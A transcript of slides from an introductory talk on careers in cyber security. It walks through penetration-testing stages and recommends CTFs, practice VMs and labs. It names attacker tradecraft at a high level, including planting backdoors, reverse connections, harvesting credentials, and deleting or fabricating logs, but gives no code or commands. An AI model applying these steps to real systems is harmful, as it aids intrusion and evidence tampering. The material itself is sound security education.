Path of Cyber Security

http://xathrya.id/ 1

Path of Cyber SecuritySatria Ady Pradana

2

# Whoami?• Satria Ady Pradana– Teknik Informatika ITB 2010– Embedded Software Engineer– DracOS Dev Team– Interest in low level stuffs– Contact me: [email protected]

http://xathrya.id/


Provided Material

• “Playground” VM– bWapp– Certain boot2root

Distributed for free, ask official


Lot of people want to be hacker.You?Why?Are you sure?


So you wanna be a Hacker?


We Have So Many Colors• White Hat• Gray Hat• Black Hat• Red Hat• Blue Hat• Green Hat• etc


The Essence of Hacking

• Getting and using other people’s computers(without getting caught)

• Defeat protection to attain some goals.• Exploiting something and gaining profit.• To have fun.


But my talk wont cover hacking as crime.

Refine word “hacker” to be “security professional”

We have two sides:• Attacker• Defender


Be Defender

• Know why you do this.• Know how attacker (might) attacks.• Know how to defend yourself, your assets, etc.• Know what to do when something happen• Know why it can be like this.

(If you are screwed, at least you know why)


Be Attacker

• Know how target organized.• Know how target reacts to certain event.• Have vast knowledge about system• Know how to be “evil” (not necessary to be

one)


But I bet you attend this meeting to be attacker.

Hacking Steps

We call it penetration testing.• Reconnaissance & Analysis• Vulnerability Mapping• Gaining Access• Privilege Escalation• Maintaining Access• Covering Tracks

Stage 1: Reconnaissance

Gathering information, search for valuable information related to our target. Analyze and extract knowledge if appropriate.Basically:• Footprinting• OSINT (Open-Source INTelligence)


Your Goal!

• Obtain information as much as possible.


• Reconnaissance is about intelligence gathering.

• Gaining facts, inferring something, relating back to target.

• Direct and indirect relevance might be helpful in later stage.

• The more useful information you get, the better chance you have to compromise.


FootprintingGather information about node, machine, system, infrastructure used. Grasping the environment before execution.

• Publicly exposed machine(which one we available to us)

• Open port(available door to us in)

• Network(relation of other systems)

• Application(ex: version)

• Server spesifics(OS, kernel, important drivers, existing services, etc)


OSINT

• Open Source INTelligence• Open = overt, publicly available source• Not about Open-Source Software.

• Try to google yourself, did you find something useful?


What Can You Get?


Now apply the same principle to target in cyberspace.

Stage 2: Vulnerability Mapping

Mapping threats and potential breach to information found.• Based on the system we found, what threat available?• How we can conduct attack?• Make priority from the list, decide which one give

greater chance of success.

Simulate scenarios to break in before we get to the next stage.


Your Goal!

• Find possible paths to penetrate target.• Creating Threat Model is helpful.

Stage 3: Gaining Access

The actual penetrating phase. Our purpose is to break in, using the vulnerabilities found in previous steps.

Or we might gain something when we are in this process. Just populate the list.


Your Goal!

• Break in / compromise.• Create a connection (persistent / non

persistent) between target and us. Mostly reverse connection.– Setup listener to receive callback.– Plant backdoor.

• Do something in target.– Ex: Create new user

Stage 4: Privilege Escalation

When we break in, we might not have enough privilege to take over. Therefore, we need to exploit other thing to take higher privilege.


Your Goal!

• Acquire highest or enough privilege to do something.

Stage 5: Maintaining Access

If we want to do a long-time campaign, we need to keep the access to compromised host available.Corporating malware is one of preferred way.


Your Goal!

• Keep access to yourself or your team.

Stage 6: Covering Tracks

Don’t let any trace left.• Delete logs• Fabricate logs

(smarter yet trickier way)

Create fake evidence (might be predefined)• Memory and Pool• File

Bonus Stage

Basically do your mission or fulfill the objective.• Dump data• Maintain persistent access• Harvest credentials• Pivoting• Proxying• Etc


It looks interesting and amusing, so how can I be hacker?


How Could I be the One?

Starting Path:• Networking• Programming

Security is another application of computer science, with several extras.

Deep understanding of subjects give better result.

Extra communication skills is better.


Area of Expertise

Some of fields (not all):• Network Security• Web Security• Mobile Security• IoT & Embedded System Security

Pick one and dive to it.


Exploits

• What is it?• Why it is important?• How to develop one?

Exploit is specific to certain product or family of product, having same / similar vulnerability.


• Given code, find bugs• Given bugs, how to coerce them into an

exploit?• Given exploit, how do you deploy it?• Given pwned system, how do you hide

yourself?


• Enough chat, gives me demos!


Demo 1 (Web Security)

• Turn Virtualbox / Vmware on!• Use bWapp VM


Demo 2

• Certain boot2root VM

• Get the write-up on DracOS repository


Okay, so where we can REALLY start learning?(Assuming you want to be expert)

• Take course on computer science (seriously)• Participate in competitions– CTF– Wargame

• Create practice lab


CTF

• Good environment to learn.• Normal security professional would do day to

day… on easy mode.


Competition (Recommended)

• IDSecconf CTF• Cyber Defense Challenge• Indonesia Cyber Army


Lab

Building lab is tedious.

try http://gauli.net/

http://gauli.net/


Advance Stuffs

• Researching and discover vulnerability• Creating toolkit• Building tradecraft• Deploying “assets” in the wild• Creating forest to hide.• etc


Final advice

• Be Evil!• Have fun!

Question?

Path of Cyber Security

Technology

Transcript of Path of Cyber Security